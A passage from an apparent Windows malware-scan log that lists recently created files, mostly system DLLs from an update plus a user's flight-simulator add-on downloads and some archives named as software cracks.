Aniel\Downloads\737800AA 2016-10-02 18:40 - 2016-10-02 18:43 - 08687986 _____ C:\Users\Kyle Aniel\Downloads\737800AA.zip 2016-10-02 18:26 - 2016-10-02 18:26 - 01515520 _____ C:\Users\Kyle Aniel\Downloads\VAInterface_2.20.3.11642 (2).msi 2016-10-02 18:26 - 2016-10-02 18:26 - 01515520 _____ C:\Users\Kyle Aniel\Downloads\VAInterface_2.20.3.11642 (1).msi 2016-10-02 17:51 - 2016-10-02 17:52 - 64991096 _____ ( Flight1, Inc.) C:\Users\Kyle Aniel\Downloads\Super-80-FSX (1).exe 2016-10-02 17:48 - 2016-10-02 17:49 - 64991096 _____ ( Flight1, Inc.) C:\Users\Kyle Aniel\Downloads\Super-80-FSX.exe 2016-10-02 17:45 - 2016-10-02 17:46 - 2969567232 _____ C:\Users\Kyle Aniel\Downloads\FSX_Acceleration.iso 2016-10-02 17:41 - 2016-10-02 17:41 - 01520816 _____ C:\Users\Kyle Aniel\Downloads\DeluxeCrack.rar 2016-10-02 17:41 - 2016-10-02 17:41 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\DeluxeCrack 2016-10-02 17:38 - 2016-10-02 17:38 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\Crackacceleration 2016-10-02 17:36 - 2016-10-02 17:36 - 01582010 _____ C:\Users\Kyle Aniel\Downloads\Crackacceleration.rar 2016-10-02 08:48 - 2016-10-02 08:52 - 142847356 _____ C:\Users\Kyle Aniel\Desktop\Captain Sim 777 demo.mp4 2016-10-02 08:33 - 2016-10-02 08:33 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\rrtrent800snd 2016-10-02 08:15 - 2016-10-02 08:16 - 54397943 _____ C:\Users\Kyle Aniel\Downloads\rrtrent800snd.zip 2016-10-02 08:10 - 2016-08-03 13:03 - 1115007685 ____N C:\Users\Kyle Aniel\Desktop\Th3.M2rt12n.15.007.M0viesC0unter.mp4 2016-10-02 07:29 - 2016-10-02 07:30 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\move 2016-10-01 21:29 - 2016-10-01 21:34 - 159565637 _____ C:\Users\Kyle Aniel\Desktop\EGLL Landing.mp4 2016-10-01 21:03 - 2016-10-01 21:03 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Expression 2016-10-01 18:52 - 2016-10-01 18:52 - 00000210 _____ C:\A320_.ini 2016-10-01 16:39 - 2016-10-01 16:44 - 1639972864 _____ C:\Users\Kyle Aniel\Downloads\AS_AIRBUS-A320-A321_FSX-P3D-FSXSTEAM_V130a.rar 2016-10-01 15:36 - 2016-10-01 15:36 - 00000210 _____ C:\B752_.ini 2016-10-01 15:21 - 2016-10-01 15:21 - 00051530 _____ C:\Users\banie_000\Documents\1.ecs 2016-10-01 15:15 - 2016-10-01 15:15 - 01515520 _____ C:\Users\Kyle Aniel\Downloads\VAInterface_2.20.3.11642.msi 2016-10-01 15:02 - 2016-10-01 15:02 - 00202240 _____ C:\Users\Kyle Aniel\Downloads\AirMouse.exe 2016-10-01 14:57 - 2016-10-01 14:57 - 22003144 _____ (Magic CPR, LLC) C:\Users\Kyle Aniel\Downloads\PointerMouseServer.exe 2016-10-01 14:56 - 2016-10-01 14:56 - 01427704 _____ (Magic CPR, LLC) C:\Users\Kyle Aniel\Downloads\MagicCPR.exe 2016-10-01 13:02 - 2016-10-01 13:02 - 00000136 _____ C:\Aircraft_cameras.INI 2016-10-01 12:42 - 2016-10-01 13:02 - 00000295 _____ C:\VC_cameras.INI 2016-10-01 12:35 - 2016-10-18 19:40 - 00001075 _____ C:\Users\Public\Desktop\English Manual.pdf.lnk 2016-10-01 12:33 - 2016-10-01 12:34 - 17538578 _____ C:\Users\Kyle Aniel\Downloads\EZDok Camera v1.18.7.rar 2016-10-01 11:20 - 2016-10-01 11:20 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\ADE_170_Production 2016-10-01 11:18 - 2016-10-01 11:19 - 17085562 _____ C:\Users\Kyle Aniel\Downloads\ADE_170_Production.zip 2016-10-01 07:53 - 2016-10-01 07:53 - 181852854 _____ C:\Users\Kyle Aniel\Downloads\FSDT-KLAXv2.7z 2016-10-01 05:55 - 2016-10-20 05:18 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Youcam 2016-09-30 06:02 - 2016-09-30 06:02 - 00204479 _____ C:\Users\Kyle Aniel\Desktop\Taxes.pdf 2016-09-29 19:00 - 2016-09-29 19:00 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Custom Office Templates 2016-09-29 18:17 - 2016-09-29 18:17 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\csb777_200_aanc 2016-09-29 18:13 - 2016-09-29 18:16 - 09176585 _____ C:\Users\Kyle Aniel\Downloads\csb777_200_aanc.zip 2016-09-29 15:15 - 2016-09-15 10:22 - 00860512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll 2016-09-29 15:15 - 2016-09-15 10:21 - 01000288 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi 2016-09-29 15:15 - 2016-09-15 09:56 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManagerApi.dll 2016-09-29 15:15 - 2016-09-15 09:40 - 05061120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll 2016-09-29 15:15 - 2016-09-15 09:40 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll 2016-09-29 15:15 - 2016-09-15 09:37 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConsoleLogon.dll 2016-09-29 15:15 - 2016-09-15 09:36 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll 2016-09-29 15:15 - 2016-09-15 09:32 - 01037312 _____ (Microsoft Corporation) C:\WINDOWS\system32\nettrace.dll 2016-09-29 15:15 - 2016-09-15 09:23 - 03405824 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll 2016-09-29 15:15 - 2016-09-15 09:21 - 02538496 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll 2016-09-29 15:15 - 2016-09-15 09:20 - 00845824 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApiPublic.dll 2016-09-29 15:15 - 2016-08-05 01:29 - 00568832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.UXRes.dll 2016-09-29 15:14 - 2016-09-15 11:14 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll 2016-09-29 15:14 - 2016-09-15 10:40 - 00965472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ReAgent.dll 2016-09-29 15:14 - 2016-09-15 10:35 - 00455040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DolbyDecMFT.dll 2016-09-29 15:14 - 2016-09-15 10:33 - 00083120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\devenum.dll 2016-09-29 15:14 - 2016-09-15 10:30 - 00354264 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe 2016-09-29 15:14 - 2016-09-15 10:29 - 01377016 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe 2016-09-29 15:14 - 2016-09-15 10:29 - 01117024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll 2016-09-29 15:14 - 2016-09-15 10:29 - 00603488 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll 2016-09-29 15:14 - 2016-09-15 10:29 - 00512416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAudDecMFT.dll 2016-09-29 15:14 - 2016-09-15 10:27 - 05622088 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe 2016-09-29 15:14 - 2016-09-15 10:27 - 00553312 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll 2016-09-29 15:14 - 2016-09-15 10:27 - 00434528 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll 2016-09-29 15:14 - 2016-09-15 10:25 - 02681200 _____ C:\WINDOWS\system32\CoreUIComponents.dll 2016-09-29 15:14 - 2016-09-15 10:23 - 00170960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll 2016-09-29 15:14 - 2016-09-15 10:21 - 01218912 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll 2016-09-29 15:14 - 2016-09-15 10:20 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll 2016-09-29 15:14 - 2016-09-15 10:20 - 00634944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll 2016-09-29 15:14 - 2016-09-15 10:18 - 00404832 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll 2016-09-29 15:14 - 2016-09-15 10:16 - 01292640 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll 2016-09-29 15:14 - 2016-09-15 10:16 - 00527808 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWanAPI.dll 2016-09-29 15:14 - 2016-09-15 10:15 - 00218976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys 2016-09-29 15:14 - 2016-09-15 10:14 - 01267512 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll 2016-09-29 15:14 - 2016-09-15 10:14 - 00119648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys 2016-09-29 15:14 - 2016-09-15 10:13 - 01264912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll 2016-09-29 15:14 - 2016-09-15 10:13 - 00113504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmapi.dll 2016-09-29 15:14 - 2016-09-15 10:12 - 00092512 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll 2016-09-29 15:14 - 2016-09-15 10:11 - 00773168 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppwinob.dll 2016-09-29 15:14 - 2016-09-15 10:10 - 01600632 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll 2016-09-29 15:14 - 2016-09-15 10:10 - 00918848 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll 2016-09-29 15:14 - 2016-09-15 10:06 - 01469120 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll 2016-09-29 15:14 - 2016-09-15 10:06 - 00587968 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll 2016-09-29 15:14 - 2016-09-15 10:06 - 00455520 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe 2016-09-29 15:14 - 2016-09-15 10:06 - 00387872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll 2016-09-29 15:14 - 2016-09-15 10:06 - 00050880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe 2016-09-29 15:14 - 2016-09-15 10:03 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll 2016-09-29 15:14 - 2016-09-15 10:03 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TempSignedLicenseExchangeTask.dll 2016-09-29 15:14 - 2016-09-15 10:03 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll 2016-09-29 15:14 - 2016-09-15 10:02 - 00187392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfksproxy.dll 2016-09-29 15:14 - 2016-09-15 10:01 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\findnetprinters.dll 2016-09-29 15:14 - 2016-09-15 10:00 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BcastDVRHelper.dll 2016-09-29 15:14 - 2016-09-15 09:59 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovslegacy.dll 2016-09-29 15:14 - 2016-09-15 09:58 - 00491008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe 2016-09-29 15:14 - 2016-09-15 09:58 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlancfg.dll 2016-09-29 15:14 - 2016-09-15 09:57 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.LowLevel.dll 2016-09-29 15:14 - 2016-09-15 09:57 - 00179712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe 2016-09-29 15:14 - 2016-09-15 09:56 - 00554496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll 2016-09-29 15:14 - 2016-09-15 09:56 - 00413184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll 2016-09-29 15:14 - 2016-09-15 09:56 - 00265728 _____ C:\WINDOWS\SysWOW64\Windows.Perception.Stub.dll 2016-09-29 15:14 - 2016-09-15 09:56 - 00262656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pdh.dll 2016-09-29 15:14 - 2016-09-15 09:55 - 01243136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.FaceAnalysis.dll 2016-09-29 15:14 - 2016-09-15 09:55 - 00222720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe 2016-09-29 15:14 - 2016-09-15 09:55 - 00213504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.CredDialogController.dll 2016-09-29 15:14 - 2016-09-15 09:55 - 00202752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.HumanInterfaceDevice.dll 2016-09-29 15:14 - 2016-09-15 09:55 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll 2016-09-29 15:14 - 2016-09-15 09:54 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mbsmsapi.dll 2016-09-29 15:14 - 2016-09-15 09:54 - 00461312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webio.dll 2016-09-29 15:14 - 2016-09-15 09:54 - 00431104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprdim.dll 2016-09-29 15:14 - 2016-09-15 09:53 - 00466432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppcext.dll 2016-09-29 15:14 - 2016-09-15 09:53 - 00314368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Usb.dll 2016-09-29 15:14 - 2016-09-15 09:52 - 00238080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll 2016-09-29 15:14 - 2016-09-15 09:51 - 02333184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmSvc.dll 2016-09-29 15:14 - 2016-09-15 09:51 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CryptoWinRT.dll 2016-09-29 15:14 - 2016-09-15 09:50 - 07219200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll 2016-09-29 15:14 - 2016-09-15 09:50 - 01534464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.3D.dll 2016-09-29 15:14 - 2016-09-15 09:50 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSManHTTPConfig.exe 2016-09-29 15:14 - 2016-09-15 09:49 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll 2016-09-29 15:14 - 2016-09-15 09:47 - 00366080 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll 2016-09-29 15:14 - 2016-09-15 09:47 - 00355328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RTMediaFrame.dll 2016-09-29 15:14 - 2016-09-15 09:46 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll 2016-09-29 15:14 - 2016-09-15 09:46 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll 2016-09-29 15:14 - 2016-09-15 09:46 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ffbroker.dll 2016-09-29 15:14 - 2016-09-15 09:43 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imapi2.dll 2016-09-29 15:14 - 2016-09-15 09:43 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offlinesam.dll 2016-09-29 15:14 - 2016-09-15 09:43 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\splwow64.exe 2016-09-29 15:14 - 2016-09-15 09:43 - 00039424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdhid.sys 2016-09-29 15:14 - 2016-09-15 09:43 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmintegrator.dll 2016-09-29 15:14 - 2016-09-15 09:42 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uReFS.dll 2016-09-29 15:14 - 2016-09-15 09:42 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll 2016-09-29 15:14 - 2016-09-15 09:41 - 03733504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll 2016-09-29 15:14 - 2016-09-15 09:41 - 00168448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthA2DP.sys 2016-09-29 15:14 - 2016-09-15 09:41 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Printers.dll 2016-09-29 15:14 - 2016-09-15 09:41 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\NfcRadioMedia.dll 2016-09-29 15:14 - 2016-09-15 09:40 - 00348160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Midi.dll 2016-09-29 15:14 - 2016-09-15 09:40 - 00194048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFi.dll 2016-09-29 15:14 - 2016-09-15 09:40 - 00160768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ACPBackgroundManagerPolicy.dll 2016-09-29 15:14 - 2016-09-15 09:40 - 00105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\VPNv2CSP.dll 2016-09-29 15:14 - 2016-09-15 09:39 - 02740224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll 2016-09-29 15:14 - 2016-09-15 09:39 - 00547840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Input.dll 2016-09-29 15:14 - 2016-09-15 09:39 - 00418304 _____ C:\WINDOWS\system32\Windows.Perception.Stub.dll 2016-09-29 15:14 - 2016-09-15 09:39 - 00295936 _____ (Microsoft Corporation) C:\WINDOWS\system32\pdh.dll 2016-09-29 15:14 - 2016-09-15 09:39 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe 2016-09-29 15:14 - 2016-09-15 09:39 - 00186368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Radios.dll 2016-09-29 15:14 - 2016-09-15 09:38 - 01291264 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll 2016-09-29 15:14 - 2016-09-15 09:38 - 00730112 _____ (Microsoft Corporation) C:\WINDOWS\system32\nshwfp.dll 2016-09-29 15:14 - 2016-09-15 09:38 - 00654336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApiPublic.dll 2016-09-29 15:14 - 2016-09-15 09:38 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovhost.dll 2016-09-29 15:14 - 2016-09-15 09:38 - 00211456 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe 2016-09-29 15:14 - 2016-09-15 09:38 - 00205824 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchFilterHost.exe 2016-09-29 15:14 - 2016-09-15 09:38 - 00132096 _____ (Microsoft Corporation) C:\WINDOWS\system32\PrintWSDAHost.dll 2016-09-29 15:14 - 2016-09-15 09:37 - 00743424 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll 2016-09-29 15:14 - 2016-09-15 09:37 - 00680448 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdh.dll 2016-09-29 15:14 - 2016-09-15 09:37 - 00390144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Search.ProtocolHandler.MAPI2.dll 2016-09-29 15:14 - 2016-09-15 09:37 - 00321024 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkUXBroker.dll 2016-09-29 15:14 - 2016-09-15 09:37 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll 2016-09-29 15:14 - 2016-09-15 09:36 - 00852480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Import.dll 2016-09-29 15:14 - 2016-09-15 09:36 - 00709120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll 2016-09-29 15:14 - 2016-09-15 09:36 - 00456192 _____ (Microsoft Corporation) C:\WINDOWS\system32\puiobj.dll 2016-09-29 15:14 - 2016-09-15 09:36 - 00410624 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpsvc.dll 2016-09-29 15:14 - 2016-09-15 09:36 - 00349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe 2016-09-29 15:14 - 2016-09-15 09:36 - 00339456 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpusersvc.dll 2016-09-29 15:14 - 2016-09-15 09:36 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\usbmon.dll 2016-09-29 15:14 - 2016-09-15 09:36 - 00166912 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovslegacy.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Vpn.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppContracts.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 00949248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.PointOfService.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 00538112 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcext.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 00496128 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprdim.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Cortana.Desktop.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Picker.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 00305152 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsvc.dll 2016-09-29 15:14 - 2016-09-15 09:35 - 00252416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Identity.Provider.dll 2016-09-29 15:14 - 2016-09-15 09:34 - 00671744 _____ (Microsoft Corporation) C:\WINDOWS\system32\mbsmsapi.dll 2016-09-29 15:14 - 2016-09-15 09:34 - 00560640 _____ (Microsoft Corporation) C:\WINDOWS\system32\webio.dll 2016-09-29 15:14 - 2016-09-15 09:34 - 00424960 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll 2016-09-29 15:14 - 2016-09-15 09:33 - 00896512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll 2016-09-29 15:14 - 2016-09-15 09:32 - 00361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdesvc.dll 2016-09-29 15:14 - 2016-09-15 09:31 - 01912320 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll 2016-09-29 15:14 - 2016-09-15 09:31 - 01553408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll 2016-09-29 15:14 - 2016-09-15 09:30 - 01227264 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpsvc.dll 2016-09-29 15:14 - 2016-09-15 09:30 - 00458752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RTMediaFrame.dll 2016-09-29 15:14 - 2016-09-15 09:30 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.DeviceEncryptionHandlers.dll 2016-09-29 15:14 - 2016-09-15 09:30 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\CastLaunch.dll 2016-09-29 15:14 - 2016-09-15 09:29 - 01105408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MiracastReceiver.dll 2016-09-29 15:14 - 2016-09-15 09:29 - 01082368 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll 2016-09-29 15:14 - 2016-09-15 09:29 - 00715264 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll 2016-09-29 15:14 - 2016-09-15 09:28 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcfg.dll 2016-09-29 15:14 - 2016-09-15 09:27 - 05111296 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll 2016-09-29 15:14 - 2016-09-15 09:27 - 01078784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.dll 2016-09-29 15:14 - 2016-09-15 09:27 - 00883712 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll 2016-09-29 15:14 - 2016-09-15 09:27 - 00627200 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpaceControl.dll 2016-09-29 15:14 - 2016-09-15 09:27 - 00582656 _____ (Microsoft Corporation) C:\WINDOWS\system32\BootMenuUX.dll 2016-09-29 15:14 - 2016-09-15 09:27 - 00279040 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveui.dll 2016-09-29 15:14 - 2016-09-15 09:27 - 00250368 _____ (Microsoft Corporation) C:\WINDOWS\system32\discan.dll 2016-09-29 15:14 - 2016-09-15 09:27 - 00211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\manage-bde.exe 2016-09-29 15:14 - 2016-09-15 09:27 - 00171008 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvenotify.exe 2016-09-29 15:14 - 2016-09-15 09:27 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Sens.dll 2016-09-29 15:14 - 2016-09-15 09:26 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\resutils.dll 2016-09-29 15:14 - 2016-09-15 09:26 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll 2016-09-29 15:14 - 2016-09-15 09:26 - 00112128 _____ (Microsoft Corporation) C:\WINDOWS\system32\BitLockerDeviceEncryption.exe 2016-09-29 15:14 - 2016-09-15 09:26 - 00033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdeui.dll 2016-09-29 15:14 - 2016-09-15 09:25 - 00947200 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_sr.dll 2016-09-29 15:14 - 2016-09-15 09:25 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll 2016-09-29 15:14 - 2016-09-15 09:25 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpaceAgent.exe 2016-09-29 15:14 - 2016-09-15 09:24 - 01080320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Ocr.dll 2016-09-29 15:14 - 2016-09-15 09:23 - 00650752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll 2016-09-29 15:14 - 2016-09-15 09:23 - 00631296 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll 2016-09-29 15:14 - 2016-09-15 09:22 - 01586176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Globalization.dll 2016-09-29 15:14 - 2016-09-15 09:22 - 00960000 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll 2016-09-29 15:14 - 2016-09-15 09:21 - 02208768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.3D.dll 2016-09-29 15:14 - 2016-09-15 09:21 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll 2016-09-29 15:14 - 2016-09-15 09:21 - 00674304 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe 2016-09-29 15:14 - 2016-09-15 09:20 - 01535488 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll 2016-09-29 15:14 - 2016-09-15 09:20 - 01266176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll 2016-09-29 15:14 - 2016-09-15 09:20 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsm.dll 2016-09-29 15:14 - 2016-09-15 09:20 - 00283648 _____ (Microsoft Corporation) C:\WINDOWS\system32\wkssvc.dll 2016-09-29 15:14 - 2016-09-15 09:19 - 01130496 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll 2016-09-29 15:14 - 2016-09-15 